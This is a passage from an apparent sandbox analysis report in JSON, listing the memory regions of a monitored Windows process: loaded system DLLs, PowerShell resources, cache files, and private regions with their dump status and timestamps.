"reference", "version": 1 }, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_530", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:30.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4685823, "entry_point": 0, "filename": null, "id": "region_531", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:00:30.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_532", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:30.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_533", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:00:30.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_534", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:30.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_535", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:30.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_536", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:30.970", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000537-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_537", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:30.979", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000538-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_538", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:30.982", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000539-addr_0x00000000001b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_539", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:30.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5771263, "entry_point": 0, "filename": null, "id": "region_540", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:00:30.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 18415615, "entry_point": 0, "filename": null, "id": "region_541", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:00:30.984", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000542-addr_0x0000000001230000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19070976, "type": "region", "version": 1 }, "end_va": 19333119, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x0000000001230000", "norm_filename": null, "region_type": "private_memory", "start_va": 19070976, "timestamp": "00:00:30.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1969618944, "type": "region", "version": 1 }, "end_va": 1969668095, "entry_point": 1969623265, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_543", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1969618944, "timestamp": "00:00:30.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1942945792, "type": "region", "version": 1 }, "end_va": 1943207935, "entry_point": 1942987485, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_544", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1942945792, "timestamp": "00:00:30.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_545", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:30.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 19333120, "type": "region", "version": 1 }, "end_va": 20246527, "entry_point": 0, "filename": null, "id": "region_546", "name": "pagefile_0x0000000001270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19333120, "timestamp": "00:00:30.995", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000547-addr_0x0000000001400000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 20971520, "type": "region", "version": 1 }, "end_va": 21233663, "entry_point": 0, "filename": null, "id": "region_547", "name": "private_0x0000000001400000", "norm_filename": null, "region_type": "private_memory", "start_va": 20971520, "timestamp": "00:00:31.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984835583, "entry_point": 1984308178, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_548", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:31.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_549", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:00:31.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_550", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:31.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960582301, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_551", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:31.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970384895, "entry_point": 1970346386, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_552", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:31.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1515519, "entry_point": 0, "filename": null, "id": "region_553", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:31.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_554", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:31.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1646591, "entry_point": 0, "filename": null, "id": "region_555", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:31.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000556-addr_0x0000000000240000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_556", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:31.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21233664, "type": "region", "version": 1 }, "end_va": 24178687, "entry_point": 21233664, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_557", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21233664, "timestamp": "00:00:31.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952120832, "type": "region", "version": 1 }, "end_va": 1953124351, "entry_point": 1952189854, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_558", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952120832, "timestamp": "00:00:31.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1955127295, "entry_point": 1953621685, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_559", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:00:31.044", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000560-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_560", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:31.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950879743, "entry_point": 1950749790, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_561", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:00:31.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1981022208, "type": "region", "version": 1 }, "end_va": 1981304831, "entry_point": 1981026785, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_562", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1981022208, "timestamp": "00:00:31.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1720319, "entry_point": 1703936, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_563", "name": "cversions.1.db", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:00:31.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 131072, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 1835008, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_564", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 1835008, "timestamp": "00:00:31.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1970937855, "entry_point": 1970869313, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_565", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:31.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1973092352, "type": "region", "version": 1 }, "end_va": 1973252095, "entry_point": 1973115065, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_566", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1973092352, "timestamp": "00:00:31.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1981349888, "type": "region", "version": 1 }, "end_va": 1983041535, "entry_point": 1981356007, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_567", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1981349888, "timestamp": "00:00:31.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_568", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:31.591", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000569-addr_0x0000000001390000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 20512768, "type": "region", "version": 1 }, "end_va": 20774911, "entry_point": 0, "filename": null, "id": "region_569", "name": "private_0x0000000001390000", "norm_filename": null, "region_type": "private_memory", "start_va": 20512768, "timestamp": "00:00:31.591", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000570-addr_0x0000000001710000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 25231359, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000001710000", "norm_filename": null, "region_type": "private_memory", "start_va": 24182784, "timestamp": "00:00:31.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 25231360, "type": "region", "version": 1 }, "end_va": 29372415, "entry_point": 0, "filename": null, "id": "region_571", "name": "pagefile_0x0000000001810000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 25231360, "timestamp": "00:00:31.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1874329600, "type": "region", "version": 1 }, "end_va": 1874640895, "entry_point": 1874340884, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_572", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1874329600, "timestamp": "00:00:31.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000573-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_573", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:31.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1839136768, "type": "region", "version": 1 }, "end_va": 1839325183, "entry_point": 1839136768, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_574", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1839136768, "timestamp": "00:00:31.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1839071232, "type": "region", "version": 1 }, "end_va": 1839108095, "entry_point": 1839076670, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_575", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1839071232, "timestamp": "00:00:32.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1720319, "entry_point": 1703936, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_576", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:00:32.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 2097152, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db", "id": "region_577", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:00:32.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2310143, "entry_point": 2293760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_578", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:00:32.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 18415616, "type": "region", "version": 1 }, "end_va": 18833407, "entry_point": 18415616, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_579", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 18415616, "timestamp": "00:00:32.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1932525568, "type": "region", "version": 1 }, "end_va": 1932984319, "entry_point": 1932533605, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_580", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1932525568, "timestamp": "00:00:32.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969000447, "entry_point": 1968902937, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_581", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:32.387", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000582-addr_0x0000000001d80000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_582", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:00:32.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1851916288, "type": "region", "version": 1 }, "end_va": 1851961343, "entry_point": 1851920896, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_583", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1851916288, "timestamp": "00:00:32.400", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000584-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_584", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:32.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 